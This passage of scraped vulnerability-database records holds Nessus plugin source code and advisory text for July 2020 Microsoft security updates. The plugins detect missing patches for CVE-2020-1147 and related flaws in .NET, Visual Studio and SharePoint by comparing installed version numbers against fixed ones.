script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1147\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint DataSet / DataTable Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:.net_core\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_dotnet_core_win.nbin\");\n script_require_keys(\"installed_sw/.NET Core Windows\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = '.NET Core Windows';\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '2.1.0', 'fixed_version' : '2.1.20' },\n { 'min_version' : '3.1.0', 'fixed_version' : '3.1.6' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-25T14:38:51", "description": "The Microsoft .NET Framework installation on the remote host is missing a security update. It is, therefore, affected by the following vulnerability :\n\n - A remote code execution vulnerability exists in .NET Framework, Microsoft SharePoint, and Visual Studio when the software fails to check the source markup of XML file input. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the process responsible for deserialization of the XML content. (CVE-2020-1147)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-14T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft .NET Framework (July 2020)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1147"], "modified": "2023-01-24T00:00:00", "cpe": ["cpe:/a:microsoft:.net_framework"], "id": "SMB_NT_MS20_JUL_DOTNET.NASL", "href": "https://www.tenable.com/plugins/nessus/138464", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138464);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/24\");\n\n script_cve_id(\"CVE-2020-1147\");\n script_xref(name:\"IAVA\", value:\"2020-A-0305-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"MSKB\", value:\"4565489\");\n script_xref(name:\"MSKB\", value:\"4565508\");\n script_xref(name:\"MSKB\", value:\"4565511\");\n script_xref(name:\"MSKB\", value:\"4565513\");\n script_xref(name:\"MSKB\", value:\"4565627\");\n script_xref(name:\"MSKB\", value:\"4565628\");\n script_xref(name:\"MSKB\", value:\"4565630\");\n script_xref(name:\"MSKB\", value:\"4565631\");\n script_xref(name:\"MSKB\", value:\"4565633\");\n script_xref(name:\"MSKB\", value:\"4566466\");\n script_xref(name:\"MSKB\", value:\"4566467\");\n script_xref(name:\"MSKB\", value:\"4566468\");\n script_xref(name:\"MSKB\", value:\"4566469\");\n script_xref(name:\"MSKB\", value:\"4566516\");\n script_xref(name:\"MSKB\", value:\"4566517\");\n script_xref(name:\"MSKB\", value:\"4566518\");\n script_xref(name:\"MSKB\", value:\"4566519\");\n script_xref(name:\"MSKB\", value:\"4566520\");\n script_xref(name:\"MSFT\", value:\"MS20-4565489\");\n script_xref(name:\"MSFT\", value:\"MS20-4565508\");\n script_xref(name:\"MSFT\", value:\"MS20-4565511\");\n script_xref(name:\"MSFT\", value:\"MS20-4565513\");\n script_xref(name:\"MSFT\", value:\"MS20-4565627\");\n script_xref(name:\"MSFT\", value:\"MS20-4565628\");\n script_xref(name:\"MSFT\", value:\"MS20-4565630\");\n script_xref(name:\"MSFT\", value:\"MS20-4565631\");\n script_xref(name:\"MSFT\", value:\"MS20-4565633\");\n script_xref(name:\"MSFT\", value:\"MS20-4566466\");\n script_xref(name:\"MSFT\", value:\"MS20-4566467\");\n script_xref(name:\"MSFT\", value:\"MS20-4566468\");\n script_xref(name:\"MSFT\", value:\"MS20-4566469\");\n script_xref(name:\"MSFT\", value:\"MS20-4566516\");\n script_xref(name:\"MSFT\", value:\"MS20-4566517\");\n script_xref(name:\"MSFT\", value:\"MS20-4566518\");\n script_xref(name:\"MSFT\", value:\"MS20-4566519\");\n script_xref(name:\"MSFT\", value:\"MS20-4566520\");\n\n script_name(english:\"Security Updates for Microsoft .NET Framework (July 2020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft .NET Framework installation on the remote host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft .NET Framework installation on the remote host\nis missing a security update. It is, therefore, affected by\nthe following vulnerability :\n\n - A remote code execution vulnerability exists in .NET\n Framework, Microsoft SharePoint, and Visual Studio when\n the software fails to check the source markup of XML\n file input. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the process responsible for deserialization of the XML\n content. (CVE-2020-1147)\");\n # https://support.microsoft.com/en-us/help/4566516/kb4566516-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e394aff7\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4566469/kb4566469\");\n # https://support.microsoft.com/en-us/help/4565508/windows-10-update-kb4565508\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b2aadf5b\");\n # https://support.microsoft.com/en-us/help/4565630/kb4565630-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?78bdeafd\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4566468/kb4566468\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4566519/kb4566519\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4566466/kb4566466\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4566517/kb4566517\");\n # https://support.microsoft.com/en-us/help/4565513/windows-10-update-kb4565513\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d0366a03\");\n # https://support.microsoft.com/en-us/help/4565511/windows-10-update-kb4565511\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?777905a0\");\n # https://support.microsoft.com/en-us/help/4565489/windows-10-update-kb4565489\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e6e77e0f\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4566518/kb4566518\");\n # https://support.microsoft.com/en-us/help/4565627/kb4565627-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?625a0a16\");\n # https://support.microsoft.com/en-us/help/4565628/kb4565628-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?822e3925\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4566520/kb4566520\");\n # https://support.microsoft.com/en-us/help/4565633/kb4565633-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8bc61313\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4566467/kb4566467\");\n # https://support.microsoft.com/en-us/help/4565631/kb4565631-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5a5f0660\");\n # https://support.microsoft.com/en-us/help/4566516/kb4566516-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e394aff7\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4566469/kb4566469\");\n # https://support.microsoft.com/en-us/help/4565508/windows-10-update-kb4565508\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b2aadf5b\");\n # https://support.microsoft.com/en-us/help/4565630/kb4565630-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?78bdeafd\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4566468/kb4566468\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4566519/kb4566519\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4566466/kb4566466\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4566517/kb4566517\");\n # https://support.microsoft.com/en-us/help/4565513/windows-10-update-kb4565513\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d0366a03\");\n # https://support.microsoft.com/en-us/help/4565511/windows-10-update-kb4565511\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?777905a0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released security updates for Microsoft .NET Framework.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1147\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint DataSet / DataTable Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:.net_framework\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_dotnet_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"microsoft_net_framework_installed.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('install_func.inc');\ninclude('misc_func.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-07';\nkbs = make_list(\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit('SMB/ProductName', exit_code:1);\nif ('Windows 8' >< productname && 'Windows 8.1' >!< productname) audit(AUDIT_OS_SP_NOT_VULN);\nelse if ('Vista' >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\napp = 'Microsoft .NET Framework';\nget_install_count(app_name:app, exit_if_zero:TRUE);\ninstalls = get_combined_installs(app_name:app);\n\nvuln = 0;\n\nif (installs[0] == 0)\n{\n foreach install (installs[1])\n {\n version = install['version'];\n if( version != UNKNOWN_VER &&\n smb_check_dotnet_rollup(rollup_date:'07_2020', dotnet_ver:version))\n vuln++;\n }\n}\nif(vuln)\n{\n hotfix_security_warning();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-25T14:37:03", "description": "The Microsoft Visual Studio Products are missing security updates. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in Visual Studio when the software fails to check the source markup of XML file input. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the process responsible for deserialization of the XML content. (CVE-2020-1147)\n\n - An elevation of privilege vulnerability exists when the Windows Diagnostics Hub Standard Collector Service fails to properly sanitize input, leading to an unsecure library-loading behavior. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. To exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application.\n (CVE-2020-1393)\n\n - An elevation of privilege vulnerability exists in Visual Studio and Visual Studio Code when they load software dependencies. A local attacker who successfully exploited the vulnerability could inject arbitrary code to run in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. To exploit this vulnerability, a local attacker would need to plant malicious content on an affected computer and wait for another user to launch Visual Studio or Visual Studio Code. (CVE-2020-1416)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-14T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft Visual Studio Products (July 2020)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1147", "CVE-2020-1393", "CVE-2020-1416"], "modified": "2023-01-24T00:00:00", "cpe": ["cpe:/a:microsoft:visual_studio"], "id": "SMB_NT_MS20_JUL_VISUAL_STUDIO.NASL", "href": "https://www.tenable.com/plugins/nessus/138473", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138473);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/24\");\n\n script_cve_id(\"CVE-2020-1147\", \"CVE-2020-1393\", \"CVE-2020-1416\");\n script_xref(name:\"MSKB\", value:\"4567703\");\n script_xref(name:\"MSFT\", value:\"MS20-4567703\");\n script_xref(name:\"IAVA\", value:\"2020-A-0309-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Security Updates for Microsoft Visual Studio Products (July 2020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Visual Studio Products are affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Visual Studio Products are missing security\nupdates. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A remote code execution vulnerability exists in Visual\n Studio when the software fails to check the source\n markup of XML file input. An attacker who successfully\n exploited the vulnerability could run arbitrary code in\n the context of the process responsible for\n deserialization of the XML content. (CVE-2020-1147)\n\n - An elevation of privilege vulnerability exists when the\n Windows Diagnostics Hub Standard Collector Service fails\n to properly sanitize input, leading to an unsecure\n library-loading behavior. An attacker who successfully\n exploited this vulnerability could run arbitrary code with\n elevated system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. To exploit this\n vulnerability, an attacker would have to log on to an\n affected system and run a specially crafted application.\n (CVE-2020-1393)\n\n - An elevation of privilege vulnerability exists in Visual\n Studio and Visual Studio Code when they load software\n dependencies. A local attacker who successfully exploited\n the vulnerability could inject arbitrary code to run in the\n context of the current user. If the current user is logged\n on with administrative user rights, an attacker could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or create\n new accounts with full user rights. To exploit this\n vulnerability, a local attacker would need to plant malicious\n content on an affected computer and wait for another user to\n launch Visual Studio or Visual Studio Code. (CVE-2020-1416)\");\n # https://support.microsoft.com/en-us/help/4567703/description-of-the-security-update-for-microsoft-visual-studio-2015-up\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6e09a167\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue:\n - KB4567703\n - Update 15.9.25 for Visual Studio 2017\n - Update 16.0.16 for Visual Studio 2019\n - Update 16.4.11 for Visual Studio 2019\n - Update 16.6.4 for Visual Studio 2019\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1416\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint DataSet / DataTable Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:visual_studio\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ms_bulletin_checks_possible.nasl\", \"microsoft_visual_studio_installed.nbin\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\", \"installed_sw/Microsoft Visual Studio\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('install_func.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\n\nget_kb_item_or_exit('installed_sw/Microsoft Visual Studio');\n\nvar port, appname, installs, report, install, version, path, prod, fix, file, fver, fversion;\n\nport = get_kb_item(\"SMB/transport\");\nappname = 'Microsoft Visual Studio';\ninstalls = get_installs(app_name:appname, exit_if_not_found:TRUE);\nreport = '';\n\nforeach install (installs[1])\n{\n version = install['version'];\n path = install['path'];\n prod = install['product_version'];\n fix = '';\n\n # VS 2015 Up3\n if (version =~ '^14\\\\.0\\\\.')\n {\n fix = '14.0.27542.0';\n file = hotfix_append_path(path:path,\n value:'\\\\Team Tools\\\\DiagnosticHubCollector\\\\Collector\\\\DiagnosticsHub.StandardCollector.Runtime.dll');\n fver = hotfix_get_fversion(path:file);\n\n if (fver['error'] != HCF_OK || empty_or_null(fver['value']))\n continue;\n\n fversion = join(sep:'.', fver['value']);\n if (ver_compare(ver:fversion, fix:fix, strict:FALSE) < 0)\n {\n report +=\n '\\n Path : ' + file +\n '\\n Installed version : ' + fversion +\n '\\n Fixed version : ' + fix +\n '\\n';\n }\n # patch_installed = false;\n # foreach name (get_kb_list('SMB/Registry/HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/*/DisplayName'))\n # if ('4567703' >< name)\n # patch_installed = true;\n\n # if (!patch_installed)\n # report +=\n # '\\nNote: The fix for this issue is available in the following update:\\n' +\n # '\\n - KB4567703 : Security update for Microsoft Visual Studio 2015 Update 3: July 14, 2020\\n' +\n # '\\n';\n }\n # VS 2017 (15.9)\n else if (prod == '2017' && version =~ '^15\\\\.[1-9]\\\\.')\n {\n fix = '15.9.28307.1216';\n\n if (ver_compare(ver: version, fix: fix, strict:FALSE) < 0)\n {\n report +=\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n }\n }\n # VS 2019 Version 16.0\n else if (prod == '2019' && version =~ '^16\\\\.0\\\\.')\n {\n fix = '16.0.28803.791';\n if (ver_compare(ver: version, fix: fix, strict:FALSE) < 0)\n {\n report +=\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n }\n }\n # VS 2019 Version 16.4\n else if (prod == '2019' && version =~ '^16\\\\.4\\\\.')\n {\n fix = '16.4.30308.118';\n if (ver_compare(ver: version, fix: fix, strict:FALSE) < 0)\n {\n report +=\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n }\n }\n # VS 2019 Version 16.6\n else if (prod == '2019' && version =~ '^16\\\\.6\\\\.')\n {\n fix = '16.6.30309.148';\n if (ver_compare(ver: version, fix: fix, strict:FALSE) < 0)\n {\n report +=\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n }\n }\n}\n\nif (empty(report))\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-25T14:37:03", "description": "The Microsoft SharePoint Server installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when Microsoft SharePoint Server and Skype for Business Server improperly handle OAuth token validation. An attacker who successfully exploited the vulnerability could bypass authentication and achieve improper access.\n (CVE-2020-1025)\n\n - An information disclosure vulnerability exists when Microsoft Office improperly discloses the contents of its memory. An attacker who exploited the vulnerability could use the information to compromise the users computer or data. (CVE-2020-1445)\n\n - An information disclosure vulnerability exists when Microsoft Office software reads out of bound memory due to an uninitialized variable, which could disclose the contents of memory. An attacker who successfully exploited the vulnerability could view out of bound memory. Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft Office software. The security update addresses the vulnerability by properly initializing the affected variable. (CVE-2020-1342)\n\n - A remote code execution vulnerability exists in PerformancePoint Services for SharePoint Server when the software fails to check the source markup of XML file input. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the process responsible for deserialization of the XML content. (CVE-2020-1439)\n\n - A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server. An authenticated attacker could exploit the vulnerability by sending a specially crafted request to an affected SharePoint server. The attacker who successfully exploited the vulnerability could then perform cross-site scripting attacks on affected systems and run script in the security context of the current user. The attacks could allow the attacker to read content that the attacker is not authorized to read, use the victim's identity to take actions on the SharePoint site on behalf of the user, such as change permissions and delete content, and inject malicious content in the browser of the user. The security update addresses the vulnerability by helping to ensure that SharePoint Server properly sanitizes web requests. (CVE-2020-1450, CVE-2020-1451, CVE-2020-1456)\n\n - A spoofing vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server. An authenticated attacker could exploit the vulnerability by sending a specially crafted request to an affected SharePoint server. The attacker who successfully exploited the vulnerability could then perform cross- site scripting attacks on affected systems and run script in the security context of the current user.\n These attacks could allow the attacker to read content that the attacker is not authorized to read, use the victim's identity to take actions on the SharePoint site on behalf of the user, such as change permissions and delete content, and inject malicious content in the browser of the user. The security update addresses the vulnerability by helping to ensure that SharePoint Server properly sanitizes web requests. (CVE-2020-1443)\n\n - A remote code execution vulnerability exists in the way Microsoft SharePoint software parses specially crafted email messages. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the system user. An attacker could then install programs; view, change, add, or delete data.\n (CVE-2020-1444)\n\n - This vulnerability is caused when SharePoint Server does not properly sanitize a specially crafted request to an affected SharePoint server. An authenticated attacker could exploit this vulnerability by sending a specially crafted request to an affected SharePoint server. The attacker who successfully exploited this vulnerability could then perform cross-site scripting attacks on affected systems and run script in the security context of the current user. These attacks could allow the attacker to read content that the attacker is not authorized to read, use the victim's identity to take actions on the SharePoint site on behalf of the victim, such as change permissions, delete content, steal sensitive information (such as browser cookies) and inject malicious content in the browser of the victim.\n For this vulnerability to be exploited, a user must click a specially crafted URL that takes the user to a targeted SharePoint Web App site. In an email attack scenario, an attacker could exploit the vulnerability by sending an email message containing the specially crafted URL to the user of the targeted SharePoint Web App site and convincing the user to click the specially crafted URL. (CVE-2020-1454)\n\n - A remote code execution vulnerability exists in Microsoft Word software when it fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could use a specially crafted file to perform actions in the security context of the current user. For example, the file could then take actions on behalf of the logged-on user with the same permissions as the current user. (CVE-2020-1446, CVE-2020-1447, CVE-2020-1448)\n\n - A remote code execution vulnerability exists in .NET Framework, Microsoft SharePoint, and Visual Studio when the software fails to check the source markup of XML file input. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the process responsible for deserialization of the XML content. (CVE-2020-1147)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-15T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft SharePoint Server (July 2020)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1025", "CVE-2020-1147", "CVE-2020-1342", "CVE-2020-1439", "CVE-2020-1443", "CVE-2020-1444", "CVE-2020-1445", "CVE-2020-1446", "CVE-2020-1447", "CVE-2020-1448", 